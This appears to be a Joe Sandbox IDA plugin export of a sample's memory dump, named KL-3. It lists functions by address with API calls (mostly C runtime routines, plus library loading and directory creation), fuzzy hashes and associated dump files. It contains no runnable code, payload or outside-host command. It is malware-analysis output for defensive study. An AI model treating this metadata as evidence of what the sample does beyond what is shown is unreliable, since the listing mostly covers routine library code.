Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: ed30eb18228478e89ca5f59fd20d4a32c535e2b0120c66c8d6549e548ecc765e
Instruction ID: dc61d0f724d6a5aba1a10fcf3f33f124a9900eb66a59b320c9256b4544da4ae2
Opcode Fuzzy Hash: ed30eb18228478e89ca5f59fd20d4a32c535e2b0120c66c8d6549e548ecc765e
Instruction Fuzzy Hash: 41819132E28B8286FB249F299E401697695FB44BA4F144235DA6DD3BDCFF3DE4418700

Function 00007FF6F9252E54 Relevance: 12.1, APIs: 8, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

_FF_MSGBANNER.LIBCMT ref: 00007FF6F9252E7B

Part of subcall function 00007FF6F9253FA0: _set_error_mode.LIBCMT ref: 00007FF6F9253FA9
Part of subcall function 00007FF6F9253FA0: _set_error_mode.LIBCMT ref: 00007FF6F9253FB8

Part of subcall function 00007FF6F9253D40: _set_error_mode.LIBCMT ref: 00007FF6F9253D85
Part of subcall function 00007FF6F9253D40: _set_error_mode.LIBCMT ref: 00007FF6F9253D96
Part of subcall function 00007FF6F9253D40: GetModuleFileNameW.KERNEL32 ref: 00007FF6F9253DF8

Part of subcall function 00007FF6F92521E8: ExitProcess.KERNEL32 ref: 00007FF6F92521F7

Part of subcall function 00007FF6F9254DD4: malloc.LIBCMT ref: 00007FF6F9254DFF
Part of subcall function 00007FF6F9254DD4: Sleep.KERNEL32 ref: 00007FF6F9254E12

_errno.LIBCMT ref: 00007FF6F9252EBD
_lock.LIBCMT ref: 00007FF6F9252ED1
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6F9252EE7
free.LIBCMT ref: 00007FF6F9252EF4
_errno.LIBCMT ref: 00007FF6F9252EF9
LeaveCriticalSection.KERNEL32 ref: 00007FF6F9252F1C

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
String ID:
API String ID: 113790786-0
Opcode ID: c45fad584c7e6e6133b4206259e614e6f6fa0dab83848ca5818ee81e43191d37
Instruction ID: 813628fd1d5b70ebfd257902ff041b2a3b14dd35d6ffbb2be25d706ec88fbf6f
Opcode Fuzzy Hash: c45fad584c7e6e6133b4206259e614e6f6fa0dab83848ca5818ee81e43191d37
Instruction Fuzzy Hash: AE215E21E3964282F764AF18FE4577A62A4EF81754F449034E56EC66CEEF7CE8408340

Function 00007FF6F9254A4C Relevance: 10.7, APIs: 7, Instructions: 184COMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 00007FF6F9254A6D

Part of subcall function 00007FF6F9254E54: Sleep.KERNEL32 ref: 00007FF6F9254E99

GetFileType.KERNEL32 ref: 00007FF6F9254BD8
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF6F9254C16

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
String ID:
API String ID: 3473179607-0
Opcode ID: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
Instruction ID: d1dd6c0f0faa98832808e31829744bb1dc408812fd275cec2e762b826daa55ec
Opcode Fuzzy Hash: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
Instruction Fuzzy Hash: DE815061A29B8685FB148F29DA84369A7A0FB84B75F544734CA7DC22DCEF3CE455C304

Function 00007FF6F925237C Relevance: 10.6, APIs: 7, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF6F92523A5

Part of subcall function 00007FF6F9252F3C: _amsg_exit.LIBCMT ref: 00007FF6F9252F66

DecodePointer.KERNEL32(?,?,00000000,00007FF6F9252569), ref: 00007FF6F92523D8
DecodePointer.KERNEL32(?,?,00000000,00007FF6F9252569), ref: 00007FF6F92523F6
DecodePointer.KERNEL32(?,?,00000000,00007FF6F9252569), ref: 00007FF6F9252436
DecodePointer.KERNEL32(?,?,00000000,00007FF6F9252569), ref: 00007FF6F9252450
DecodePointer.KERNEL32(?,?,00000000,00007FF6F9252569), ref: 00007FF6F9252460
ExitProcess.KERNEL32 ref: 00007FF6F92524EC

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: DecodePointer$ExitProcess_amsg_exit_lock
String ID:
API String ID: 3411037476-0
Opcode ID: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
Instruction ID: 6cb54f57cec3bb75029b934dc96192c94a619e58e5e3e67278d9cb3751bbdcc5
Opcode Fuzzy Hash: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
Instruction Fuzzy Hash: A1412C22A3964281FB549F19FE442396294BF88B84F144435E96DC37EDFF7CE8598700

Function 00007FF6F9255A08 Relevance: 9.1, APIs: 6, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF6F9255A27

Part of subcall function 00007FF6F92535FC: _amsg_exit.LIBCMT ref: 00007FF6F9253612

Part of subcall function 00007FF6F9255644: _getptd.LIBCMT ref: 00007FF6F925564E
Part of subcall function 00007FF6F9255644: _amsg_exit.LIBCMT ref: 00007FF6F92556EB

Part of subcall function 00007FF6F9255700: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FF6F9255A42,?,?,?,?,?,00007FF6F9255BFF), ref: 00007FF6F925572A

Part of subcall function 00007FF6F9254DD4: malloc.LIBCMT ref: 00007FF6F9254DFF
Part of subcall function 00007FF6F9254DD4: Sleep.KERNEL32 ref: 00007FF6F9254E12

free.LIBCMT ref: 00007FF6F9255AB2

Part of subcall function 00007FF6F9252A80: RtlFreeHeap.NTDLL ref: 00007FF6F9252A96
Part of subcall function 00007FF6F9252A80: _errno.LIBCMT ref: 00007FF6F9252AA0
Part of subcall function 00007FF6F9252A80: GetLastError.KERNEL32 ref: 00007FF6F9252AA8

_lock.LIBCMT ref: 00007FF6F9255AE2
free.LIBCMT ref: 00007FF6F9255B85
free.LIBCMT ref: 00007FF6F9255BB1
_errno.LIBCMT ref: 00007FF6F9255BB6

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
String ID:
API String ID: 3894533514-0
Opcode ID: 824adb76af916895ba058728fd5f93fb0c79903021a6f053eebfd9d524029669
Instruction ID: 6ed381466d9c512e243d64e8e4f06110baf09ce076c0fda5d0d4de28aaf1947b
Opcode Fuzzy Hash: 824adb76af916895ba058728fd5f93fb0c79903021a6f053eebfd9d524029669
Instruction Fuzzy Hash: F651BD3AA2864286F7149F2CAE4067976A1FB90B54F144136DA6EC73DEEF7DE402C740

Function 00007FF6F9254958 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6F9252C6C), ref: 00007FF6F9254971
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6F9252C6C), ref: 00007FF6F92549C8
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6F9252C6C), ref: 00007FF6F9254A03
free.LIBCMT ref: 00007FF6F9254A10
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6F9252C6C), ref: 00007FF6F9254A1B
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6F9252C6C), ref: 00007FF6F9254A29

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
String ID:
API String ID: 517548149-0
Opcode ID: 4f192c9dc046e425828ac888878adfb7fcee4b4893ec04fbb41d632eaf74bbd9
Instruction ID: 5103eac97db960b2db3ece9a9690e4d49f30f6ff5ad5e34ea860346cf6737f38
Opcode Fuzzy Hash: 4f192c9dc046e425828ac888878adfb7fcee4b4893ec04fbb41d632eaf74bbd9
Instruction Fuzzy Hash: E9212132A29B8186FB649F1AA951069B7E5FB84BD0B485034DE5EC7B9CEF3CE450C704

Function 00007FF6F9253578 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6F9253582
FlsGetValue.KERNEL32 ref: 00007FF6F9253590
SetLastError.KERNEL32 ref: 00007FF6F92535E8

Part of subcall function 00007FF6F9254E54: Sleep.KERNEL32 ref: 00007FF6F9254E99

FlsSetValue.KERNEL32 ref: 00007FF6F92535BC
free.LIBCMT ref: 00007FF6F92535DF

Part of subcall function 00007FF6F92534C0: _lock.LIBCMT ref: 00007FF6F9253514
Part of subcall function 00007FF6F92534C0: _lock.LIBCMT ref: 00007FF6F9253533

GetCurrentThreadId.KERNEL32 ref: 00007FF6F92535D0

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: 070530a34a10f5dcc5882d25cfdaa8dc903071aa9d5905c5bd9c744f4c09bd1b
Instruction ID: 30b02615e4e56df5302f4aa6ceba0a22bf84cf790df7785ee22040f89d577390
Opcode Fuzzy Hash: 070530a34a10f5dcc5882d25cfdaa8dc903071aa9d5905c5bd9c744f4c09bd1b
Instruction Fuzzy Hash: B7012561A2D74382FB159F6D9E850396291AF487A4B149234D93DC23DDFE3CE844C611

Function 00007FF6F9251908 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00007FF6F9251E80), ref: 00007FF6F925192B
GetProcAddress.KERNEL32(?,?,?,00007FF6F9251E80), ref: 00007FF6F925194D
FreeLibrary.KERNEL32(?,?,?,00007FF6F9251E80), ref: 00007FF6F9251965

Strings

ConvertSidToStringSidA, xrefs: 00007FF6F9251943
Advapi32.dll, xrefs: 00007FF6F925191C

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Advapi32.dll$ConvertSidToStringSidA
API String ID: 145871493-1798845326
Opcode ID: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
Instruction ID: 841be64e7b5e0e574f4c319292313b7ff48f1a4e0bf8f093343bc06bdaf0647c
Opcode Fuzzy Hash: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
Instruction Fuzzy Hash: B7F06211B29B8186FB589F1ABA8012962A0AF48BC0F484034DD5EC378DFE7CD4458200

Function 00007FF6F9256CF0 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6F9256D4A
malloc.LIBCMT ref: 00007FF6F9256DAE
MultiByteToWideChar.KERNEL32 ref: 00007FF6F9256DF6
GetStringTypeW.KERNEL32 ref: 00007FF6F9256E0D
free.LIBCMT ref: 00007FF6F9256E21

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 797ade63286dbeba8885ce997cb2c285b6de5264252abc1b03857e69b2117621
Instruction ID: bdccffd46bcd8d9b31283caa35e1d8ca7b62b22ccb6c42ac2fe5e023bf97e5eb
Opcode Fuzzy Hash: 797ade63286dbeba8885ce997cb2c285b6de5264252abc1b03857e69b2117621
Instruction Fuzzy Hash: C4418172A2664286FB509F299D005A96395FF44BA8F184635EE3DC77DCEF3CE4058340

Function 00007FF6F9253884 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,00007FF6F9253999,?,?,?,?,00007FF6F9252322), ref: 00007FF6F92538AD
DecodePointer.KERNEL32(?,?,?,00007FF6F9253999,?,?,?,?,00007FF6F9252322), ref: 00007FF6F92538BD

Part of subcall function 00007FF6F9255C10: _errno.LIBCMT ref: 00007FF6F9255C19
Part of subcall function 00007FF6F9255C10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6F9255C24

EncodePointer.KERNEL32(?,?,?,00007FF6F9253999,?,?,?,?,00007FF6F9252322), ref: 00007FF6F925393B

Part of subcall function 00007FF6F9254ED8: realloc.LIBCMT ref: 00007FF6F9254F03
Part of subcall function 00007FF6F9254ED8: Sleep.KERNEL32(?,?,00000000,00007FF6F925392B,?,?,?,00007FF6F9253999,?,?,?,?,00007FF6F9252322), ref: 00007FF6F9254F1F

EncodePointer.KERNEL32(?,?,?,00007FF6F9253999,?,?,?,?,00007FF6F9252322), ref: 00007FF6F925394B
EncodePointer.KERNEL32(?,?,?,00007FF6F9253999,?,?,?,?,00007FF6F9252322), ref: 00007FF6F9253958

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
String ID:
API String ID: 1909145217-0
Opcode ID: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
Instruction ID: 1e020fe4aa892abc826f6a5b6d6dab256553902415f056272dcb0599873c5860
Opcode Fuzzy Hash: 4940477addc9b0a06b05c4a846dbb85c33dab70dfa6eb05361a17cef25bb7483
Instruction Fuzzy Hash: A0215E61B3A64291FB059F69EF48069A391BB44B80B449835DA6ED77DCFE7CE4458300

Function 00007FF6F925180C Relevance: 7.6, APIs: 5, Instructions: 67stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32 ref: 00007FF6F9251840
lstrcatA.KERNEL32 ref: 00007FF6F925185A
lstrlenA.KERNEL32 ref: 00007FF6F9251863
SetCurrentDirectoryA.KERNEL32 ref: 00007FF6F92518B6
CreateDirectoryA.KERNEL32 ref: 00007FF6F92518C7

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: Directorylstrlen$CreateCurrentlstrcat
String ID:
API String ID: 279805598-0
Opcode ID: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
Instruction ID: f0c9d35170092e8a0e75a3eaff472e86026652175798270982e4b1716be91eed
Opcode Fuzzy Hash: 0a666403a0a7a8bb7b1efce5b465705f4daf3f27353a5bf9fe29aeb5550ffb80
Instruction Fuzzy Hash: D9215421B28B8286F734CF19ED9827A6395AF49784F844134CA5DC269DFE6CD5458740

Function 00007FF6F92521AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6F92521BB
GetProcAddress.KERNEL32 ref: 00007FF6F92521D0

Strings

mscoree.dll, xrefs: 00007FF6F92521B4
CorExitProcess, xrefs: 00007FF6F92521C6

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
Instruction ID: 1ded9aa0d712d96020ecb7c374f844b2a0aebc3410ff9864d4e1d152749d825a
Opcode Fuzzy Hash: 8f486db55653188f3ab92f84992e0e837d09d0e4da1761e541b774056590203c
Instruction Fuzzy Hash: 01E01210F3660282FF1D5F69AD441351250BF48740B489039C93EC63DDFF6CE9898300

Function 00007FF6F9252FF4 Relevance: 6.2, APIs: 4, Instructions: 159COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF6F9253042
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6F925304D
DecodePointer.KERNEL32(?,?,?,?,?,00007FF6F9254F78,?,?,?,?,00007FF6F9252F9E), ref: 00007FF6F92530FC
_lock.LIBCMT ref: 00007FF6F9253127

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
String ID:
API String ID: 27599310-0
Opcode ID: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
Instruction ID: 5fc289fe162d8d0ca8c4b9334ad7cdc87d246b8fe3459fb9a30f96bb25d59074
Opcode Fuzzy Hash: 3a40b65b40ca71dd689e369f6f90380ad122d4fc96e66dd60881ed5306886c74
Instruction Fuzzy Hash: 03516E32A39742C2FB699F2DAEC423A6691EB84750F149535D96EC26DCEF3CE845C201

Function 00007FF6F9255644 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF6F925564E

Part of subcall function 00007FF6F92535FC: _amsg_exit.LIBCMT ref: 00007FF6F9253612

_lock.LIBCMT ref: 00007FF6F925567C
free.LIBCMT ref: 00007FF6F92556B2
_amsg_exit.LIBCMT ref: 00007FF6F92556EB

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6f9250000_KL-3.jbxd

Similarity

API ID: _amsg_exit$_getptd_lockfree
String ID:
API String ID: 2148533958-0
Opcode ID: 23db9903bf861fb168630996b7ef8a8dbce7089be7bf2da4b1eaf1e8c34edcee
Instruction ID: 59497d9676205cc968b6fd9cebd3ac18c817dfe8d03968d277b095d42654c285
Opcode Fuzzy Hash: 23db9903bf861fb168630996b7ef8a8dbce7089be7bf2da4b1eaf1e8c34edcee
Instruction Fuzzy Hash: 43110D26A3A68182FB989F19EE807797260FB44740F085035DA2DC37DDEF2DE450CA01

Function 00007FF6F9255350 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 00007FF6F9255356

Part of subcall function 00007FF6F92535FC: _amsg_exit.LIBCMT ref: 00007FF6F9253612

_getptd.LIBCMT ref: 00007FF6F9255376
_lock.LIBCMT ref: 00007FF6F9255389
_amsg_exit.LIBCMT ref: 00007FF6F92553B7

Memory Dump Source

Source File: 00000000.00000002.2237454444.00007FF6F9251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F9250000, based on PE: true

Associated: 00000000.00000002.2237432404.00007FF6F9250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237476981.00007FF6F9258000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237501154.00007FF6F925C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F925F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F9264000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237522025.00007FF6F92A2000.00000002.00000001.01000000.00000003.sdmpDownload File

